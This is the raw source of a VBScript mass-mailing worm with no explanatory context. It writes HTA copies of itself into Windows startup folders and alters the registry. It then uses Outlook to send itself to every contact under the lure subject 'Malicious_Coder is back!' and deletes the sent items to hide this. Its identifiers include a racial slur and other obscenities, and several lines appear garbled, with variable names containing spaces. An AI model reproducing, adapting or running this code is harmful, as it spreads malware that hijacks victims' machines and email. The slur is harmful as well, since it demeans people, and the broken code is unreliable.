On Error Resume Next Malicious.Path = "C:\WINDOWS\START 
MENU\PROGRAMS\STARTUP\AVP.HTA" Malicious.Doc = "<" & "html>" & 
Chr(13) & Chr(10) & "<" & "head>" & Chr(13) & Chr(10) 
& "<" & "title>" & Chr(13) & Chr(10) & "Update" & 
Chr(13) & Chr(10) & "<" & "/title>" & Chr(13) & 
Chr(10) & "<" & "/head>" & Chr(13) & Chr(10) & "<" 
& "body bgcolor=""#c0c0c0"" text=""#c0c0c0"">" & Chr(13) & 
Chr(10) & "<" & "script language=""VBScript"">" & Chr(13) 
& Chr(10) & "On Error Resume Next" & Chr(13) & Chr(10) & 
"Set sAtAnIk_cHiLd = CreateObject(""WScript.Shell"")" & Chr(13) & 
Chr(10) & "sAtAnIk_cHiLd.RegWrite 
""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner"",""Malicious_Coder""" 
& Chr(13) & Chr(10) & "sAtAnIk_cHiLd.RegWrite 
""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization"",""Malicious 
Industries""" & Chr(13) & Chr(10) & "nAtAs = 
sAtAnIk_cHiLd.RegRead(""HKEY_LOCAL_MACHINE\Software\OUTLOOK.Malicious_Coder\"")" 
& Chr(13) & Chr(10) & "If nAtAs <> ""OUTLOOK.Malicious_Coder 
1.0 by SiX_SiX_SiX"" Then" & Chr(13) & Chr(10) & "SetBill Gates = 
CreateObject(""Outlook.Application"")" & Chr(13) & Chr(10) & "Set 
eVIL_oNe =Bill Gates.GetNameSpace(""MAPI"")" & Chr(13) & Chr(10) & 
"For Each Opie In eVIL_oNe.AddressLists" & Chr(13) & Chr(10) & "If 
Opie.AddressEntries.Count <> 0 Then" & Chr(13) & Chr(10) & 
"Set FuckFace =Bill Gates.CreateItem(0)" & Chr(13) & Chr(10) & "For 
Barney_Phief = 1 To Opie.AddressEntries.Count" & Chr(13) & Chr(10) & 
"Set Lucifer = Opie.AddressEntries(Barney_Phief)" & Chr(13) & Chr(10) 
& "If Barney_Phief = 1 Then" & Chr(13) & Chr(10) & "FuckFace.BCC 
= Lucifer.Address" & Chr(13) & Chr(10) & "Else" & Chr(13) & 
Chr(10) & "FuckFace.BCC = FuckFace.BCC & ""; "" & Lucifer.Address" 
& Chr(13) & Chr(10) & "End If" & Chr(13) & Chr(10) & 
"Next" & Chr(13) & Chr(10) & "FuckFace.Subject = ""Malicious_Coder 
is back!""" & Chr(13) & Chr(10) & "Set Pervert = 
CreateObject(""Scripting.FileSystemObject"")" & Chr(13) & Chr(10) & 
"Set Richard Pryor = 
Pervert.OpenTextFile(Replace(Replace(Replace(Location.PathName,""/"",""""),""%20"","" 
""),""%FA"",""Ú""),1)" & Chr(13) & Chr(10) & "Dumb Nigger = False" 
& Chr(13) & Chr(10) & "Do While Richard Pryor.AtEndOfStream = False" 
& Chr(13) & Chr(10) & "Pencil_Dick= Richard Pryor.ReadLine" & 
Chr(13) & Chr(10) & "If Dumb Nigger = False Then" & Chr(13) & 
Chr(10) & "If Right(Your Mother,6) = ""<"" & ""html>"" Then" & 
Chr(13) & Chr(10) & "Dumb Nigger = True" & Chr(13) & Chr(10) 
& "Your Mother = """"""<"" & ""html>""""""" & Chr(13) & 
Chr(10) & "End If" & Chr(13) & Chr(10) & "Else" & Chr(13) 
& Chr(10) & "If Left(Your Mother,7) = ""<"" & ""/html>"" Then" 
& Chr(13) & Chr(10) & "Your Mother = Your Mother & "" & 
Chr(13) & Chr(10) & """"<"" & ""/html>""""""" & Chr(13) 
& Chr(10) & "Dumb Nigger = False" & Chr(13) & Chr(10) & 
"Else" & Chr(13) & Chr(10) & "Your Mother = Your Mother & "" 
& Chr(13) & Chr(10) & """""" & Replace(Your 
Mother,"""""""","""""""""""") & """"""""" & Chr(13) & Chr(10) & 
"End If" & Chr(13) & Chr(10) & "End If" & Chr(13) & Chr(10) 
& "Loop" & Chr(13) & Chr(10) & "Richard Pryor.Close" & 
Chr(13) & Chr(10) & "FuckFace.HTMLBody = ""<"" & ""html>"" 
& Chr(13) & Chr(10) & ""<"" & ""head>"" & Chr(13) 
& Chr(10) & ""<"" & ""title>"" & Chr(13) & Chr(10) 
& ""Malicious_Coder is back!"" & Chr(13) & Chr(10) & ""<"" 
& ""/title>"" & Chr(13) & Chr(10) & ""<"" & 
""/head>"" & Chr(13) & Chr(10) & ""<"" & ""body 
alink=""""#ffffff"""" bgcolor=""""#000000"""" link=""""#ffffff"""" 
text=""""#ffffff"""" vlink=""""#ffffff"""">"" & Chr(13) & Chr(10) 
& ""<"" & ""font face=""""arial"""" size=""""4"""">"" & 
Chr(13) & Chr(10) & ""<"" & ""strong>"" & Chr(13) & 
Chr(10) & ""The Malicious_Coder incident, pictures and sounds"" & 
Chr(13) & Chr(10) & ""<"" & ""/strong>"" & Chr(13) & 
Chr(10) & ""<"" & ""br>"" & Chr(13) & Chr(10) & 
""<"" & ""br>"" & Chr(13) & Chr(10) & ""<"" & ""a 
href=""""http://www.avp.com"""">http://www.avp.com<"" & ""/a>"" 
& Chr(13) & Chr(10) & ""<"" & ""/font>"" & Chr(13) 
& Chr(10) & ""<"" & ""object 
classid=""""clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"""" 
id=""""Malicious"""">"" & Chr(13) & Chr(10) & ""<"" & 
""/object>"" & Chr(13) & Chr(10) & ""<"" & ""object 
classid=""""clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"""" 
id=""""SoupNazi"""">"" & Chr(13) & Chr(10) & ""<"" & 
""/object>"" & Chr(13) & Chr(10) & ""<"" & ""script 
language=""""VBScript"""">"" & Chr(13) & Chr(10) & ""On Error 
Resume Next"" & Chr(13) & Chr(10) & ""Malicious.Path = 
""""C:\WINDOWS\START MENU\PROGRAMS\STARTUP\UPDATE.HTA"""""" & Chr(13) & 
Chr(10) & ""Malicious.Doc = "" & Newman(Your Mother) & Chr(13) & 
Chr(10) & ""Malicious.Write"" & Chr(13) & Chr(10) & 
""SoupNazi.Path = """"C:\WINDOWS\MENÚ INICIO\PROGRAMAS\INICIO\UPDATE.HTA"""""" 
& Chr(13) & Chr(10) & ""SoupNazi.Doc = "" & Newman(Your Mother) 
& Chr(13) & Chr(10) & ""SoupNazi.Write"" & Chr(13) & Chr(10) 
& ""<"" & ""/script>"" & Chr(13) & Chr(10) & ""<"" 
& ""/body>"" & Chr(13) & Chr(10) & ""<"" & 
""/html>"" & Chr(13) & Chr(10)" & Chr(13) & Chr(10) & 
"FuckFace.DeleteAfterSubmit = True" & Chr(13) & Chr(10) & 
"FuckFace.Send" & Chr(13) & Chr(10) & "End If" & Chr(13) & 
Chr(10) & "Next" & Chr(13) & Chr(10) & "sAtAnIk_cHiLd.RegWrite 
""HKEY_LOCAL_MACHINE\Software\OUTLOOK.Malicious_Coder\"",""OUTLOOK.Malicious_Coder 
1.0 by SiX_SiX_SiX""" & Chr(13) & Chr(10) & "End If" & Chr(13) 
& Chr(10) & "Function Newman(Moops)" & Chr(13) & Chr(10) & 
"Newman = Replace(Moops,""<" & "h"",""<"""" & """"h"")" & 
Chr(13) & Chr(10) & "Newman = Replace(Newman,""<" & 
"t"",""<"""" & """"t"")" & Chr(13) & Chr(10) & "Newman = 
Replace(Newman,""<" & "b"",""<"""" & """"b"")" & Chr(13) & 
Chr(10) & "Newman = Replace(Newman,""<" & "s"",""<"""" & 
""""s"")" & Chr(13) & Chr(10) & "Newman = Replace(Newman,""<" 
& "f"",""<"""" & """"f"")" & Chr(13) & Chr(10) & "Newman 
= Replace(Newman,""<" & "/"",""<"""" & """"/"")" & Chr(13) 
& Chr(10) & "End Function" & Chr(13) & Chr(10) & "<" 
& "/script>" & Chr(13) & Chr(10) & "<" & "font 
color=""#000000"">" & Chr(13) & Chr(10) & "<" & 
"strong>" & Chr(13) & Chr(10) & "System error, delete 
""UPDATE.HTA"" from the startup folder to solve this problem." & Chr(13) 
& Chr(10) & "<" & "/strong>" & Chr(13) & Chr(10) & 
"<" & "/font>" & Chr(13) & Chr(10) & "<" & 
"/body>" & Chr(13) & Chr(10) & "<" & "/html>" 
Malicious.Write SoupNazi.Path = "C:\WINDOWS\MENÚ 
INICIO\PROGRAMAS\INICIO\UPDATE.HTA" SoupNazi.Doc = "<" & "html>" & 
Chr(13) & Chr(10) & "<" & "head>" & Chr(13) & Chr(10) 
& "<" & "title>" & Chr(13) & Chr(10) & "Update" & 
Chr(13) & Chr(10) & "<" & "/title>" & Chr(13) & 
Chr(10) & "<" & "/head>" & Chr(13) & Chr(10) & "<" 
& "body bgcolor=""#c0c0c0"" text=""#c0c0c0"">" & Chr(13) & 
Chr(10) & "<" & "script language=""VBScript"">" & Chr(13) 
& Chr(10) & "On Error Resume Next" & Chr(13) & Chr(10) & 
"Set sAtAnIk_cHiLd = CreateObject(""WScript.Shell"")" & Chr(13) & 
Chr(10) & "sAtAnIk_cHiLd.RegWrite 
""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner"",""Malicious_Coder""" 
& Chr(13) & Chr(10) & "sAtAnIk_cHiLd.RegWrite 
""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization"",""Malicious 
Industries""" & Chr(13) & Chr(10) & "nAtAs = 
sAtAnIk_cHiLd.RegRead(""HKEY_LOCAL_MACHINE\Software\OUTLOOK.Malicious_Coder\"")" 
& Chr(13) & Chr(10) & "If nAtAs <> ""OUTLOOK.Malicious_Coder 
1.0 by SiX_SiX_SiX"" Then" & Chr(13) & Chr(10) & "SetBill Gates = 
CreateObject(""Outlook.Application"")" & Chr(13) & Chr(10) & "Set 
eVIL_oNe =Bill Gates.GetNameSpace(""MAPI"")" & Chr(13) & Chr(10) & 
"For Each Opie In eVIL_oNe.AddressLists" & Chr(13) & Chr(10) & "If 
Opie.AddressEntries.Count <> 0 Then" & Chr(13) & Chr(10) & 
"Set FuckFace =Bill Gates.CreateItem(0)" & Chr(13) & Chr(10) & "For 
Barney_Phief = 1 To Opie.AddressEntries.Count" & Chr(13) & Chr(10) & 
"Set Lucifer = Opie.AddressEntries(Barney_Phief)" & Chr(13) & Chr(10) 
& "If Barney_Phief = 1 Then" & Chr(13) & Chr(10) & "FuckFace.BCC 
= Lucifer.Address" & Chr(13) & Chr(10) & "Else" & Chr(13) & 
Chr(10) & "FuckFace.BCC = FuckFace.BCC & ""; "" & Lucifer.Address" 
& Chr(13) & Chr(10) & "End If" & Chr(13) & Chr(10) & 
"Next" & Chr(13) & Chr(10) & "FuckFace.Subject = ""Malicious_Coder 
is back!""" & Chr(13) & Chr(10) & "Set Pervert = 
CreateObject(""Scripting.FileSystemObject"")" & Chr(13) & Chr(10) & 
"Set Richard Pryor = 
Pervert.OpenTextFile(Replace(Replace(Replace(Location.PathName,""/"",""""),""%20"","" 
""),""%FA"",""Ú""),1)" & Chr(13) & Chr(10) & "Dumb Nigger = False" 
& Chr(13) & Chr(10) & "Do While Richard Pryor.AtEndOfStream = False" 
& Chr(13) & Chr(10) & "Pencil_Dick= Richard Pryor.ReadLine" & 
Chr(13) & Chr(10) & "If Dumb Nigger = False Then" & Chr(13) & 
Chr(10) & "If Right(Your Mother,6) = ""<"" & ""html>"" Then" & 
Chr(13) & Chr(10) & "Dumb Nigger = True" & Chr(13) & Chr(10) 
& "Your Mother = """"""<"" & ""html>""""""" & Chr(13) & 
Chr(10) & "End If" & Chr(13) & Chr(10) & "Else" & Chr(13) 
& Chr(10) & "If Left(Your Mother,7) = ""<"" & ""/html>"" Then" 
& Chr(13) & Chr(10) & "Your Mother = Your Mother & "" & 
Chr(13) & Chr(10) & """"<"" & ""/html>""""""" & Chr(13) 
& Chr(10) & "Dumb Nigger = False" & Chr(13) & Chr(10) & 
"Else" & Chr(13) & Chr(10) & "Your Mother = Your Mother & "" 
& Chr(13) & Chr(10) & """""" & Replace(Your 
Mother,"""""""","""""""""""") & """"""""" & Chr(13) & Chr(10) & 
"End If" & Chr(13) & Chr(10) & "End If" & Chr(13) & Chr(10) 
& "Loop" & Chr(13) & Chr(10) & "Richard Pryor.Close" & 
Chr(13) & Chr(10) & "FuckFace.HTMLBody = ""<"" & ""html>"" 
& Chr(13) & Chr(10) & ""<"" & ""head>"" & Chr(13) 
& Chr(10) & ""<"" & ""title>"" & Chr(13) & Chr(10) 
& ""Malicious_Coder is back!"" & Chr(13) & Chr(10) & ""<"" 
& ""/title>"" & Chr(13) & Chr(10) & ""<"" & 
""/head>"" & Chr(13) & Chr(10) & ""<"" & ""body 
alink=""""#ffffff"""" bgcolor=""""#000000"""" link=""""#ffffff"""" 
text=""""#ffffff"""" vlink=""""#ffffff"""">"" & Chr(13) & Chr(10) 
& ""<"" & ""font face=""""arial"""" size=""""4"""">"" & 
Chr(13) & Chr(10) & ""<"" & ""strong>"" & Chr(13) & 
Chr(10) & ""The Malicious_Coder incident, pictures and sounds"" & 
Chr(13) & Chr(10) & ""<"" & ""/strong>"" & Chr(13) & 
Chr(10) & ""<"" & ""br>"" & Chr(13) & Chr(10) & 
""<"" & ""br>"" & Chr(13) & Chr(10) & ""<"" & ""a 
href=""""http://www.avp.com"""">http://www.avp.com<"" & ""/a>"" 
& Chr(13) & Chr(10) & ""<"" & ""/font>"" & Chr(13) 
& Chr(10) & ""<"" & ""object 
classid=""""clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"""" 
id=""""Malicious"""">"" & Chr(13) & Chr(10) & ""<"" & 
""/object>"" & Chr(13) & Chr(10) & ""<"" & ""object 
classid=""""clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"""" 
id=""""SoupNazi"""">"" & Chr(13) & Chr(10) & ""<"" & 
""/object>"" & Chr(13) & Chr(10) & ""<"" & ""script 
language=""""VBScript"""">"" & Chr(13) & Chr(10) & ""On Error 
Resume Next"" & Chr(13) & Chr(10) & ""Malicious.Path = 
""""C:\WINDOWS\START MENU\PROGRAMS\STARTUP\UPDATE.HTA"""""" & Chr(13) & 
Chr(10) & ""Malicious.Doc = "" & Newman(Your Mother) & Chr(13) & 
Chr(10) & ""Malicious.Write"" & Chr(13) & Chr(10) & 
""SoupNazi.Path = """"C:\WINDOWS\MENÚ INICIO\PROGRAMAS\INICIO\UPDATE.HTA"""""" 
& Chr(13) & Chr(10) & ""SoupNazi.Doc = "" & Newman(Your Mother) 
& Chr(13) & Chr(10) & ""SoupNazi.Write"" & Chr(13) & Chr(10) 
& ""<"" & ""/script>"" & Chr(13) & Chr(10) & ""<"" 
& ""/body>"" & Chr(13) & Chr(10) & ""<"" & 
""/html>"" & Chr(13) & Chr(10)" & Chr(13) & Chr(10) & 
"FuckFace.DeleteAfterSubmit = True" & Chr(13) & Chr(10) & 
"FuckFace.Send" & Chr(13) & Chr(10) & "End If" & Chr(13) & 
Chr(10) & "Next" & Chr(13) & Chr(10) & "sAtAnIk_cHiLd.RegWrite 
""HKEY_LOCAL_MACHINE\Software\OUTLOOK.Malicious_Coder\"",""OUTLOOK.Malicious_Coder 
1.0 by SiX_SiX_SiX""" & Chr(13) & Chr(10) & "End If" & Chr(13) 
& Chr(10) & "Function Newman(Moops)" & Chr(13) & Chr(10) & 
"Newman = Replace(Moops,""<" & "h"",""<"""" & """"h"")" & 
Chr(13) & Chr(10) & "Newman = Replace(Newman,""<" & 
"t"",""<"""" & """"t"")" & Chr(13) & Chr(10) & "Newman = 
Replace(Newman,""<" & "b"",""<"""" & """"b"")" & Chr(13) & 
Chr(10) & "Newman = Replace(Newman,""<" & "s"",""<"""" & 
""""s"")" & Chr(13) & Chr(10) & "Newman = Replace(Newman,""<" 
& "f"",""<"""" & """"f"")" & Chr(13) & Chr(10) & "Newman 
= Replace(Newman,""<" & "/"",""<"""" & """"/"")" & Chr(13) 
& Chr(10) & "End Function" & Chr(13) & Chr(10) & "<" 
& "/script>" & Chr(13) & Chr(10) & "<" & "font 
color=""#000000"">" & Chr(13) & Chr(10) & "<" & 
"strong>" & Chr(13) & Chr(10) & "System error, delete 
""UPDATE.HTA"" from the startup folder to solve this problem." & Chr(13) 
& Chr(10) & "<" & "/strong>" & Chr(13) & Chr(10) & 
"<" & "/font>" & Chr(13) & Chr(10) & "<" & 
"/body>" & Chr(13) & Chr(10) & "<" & "/html>" 
SoupNazi.Write 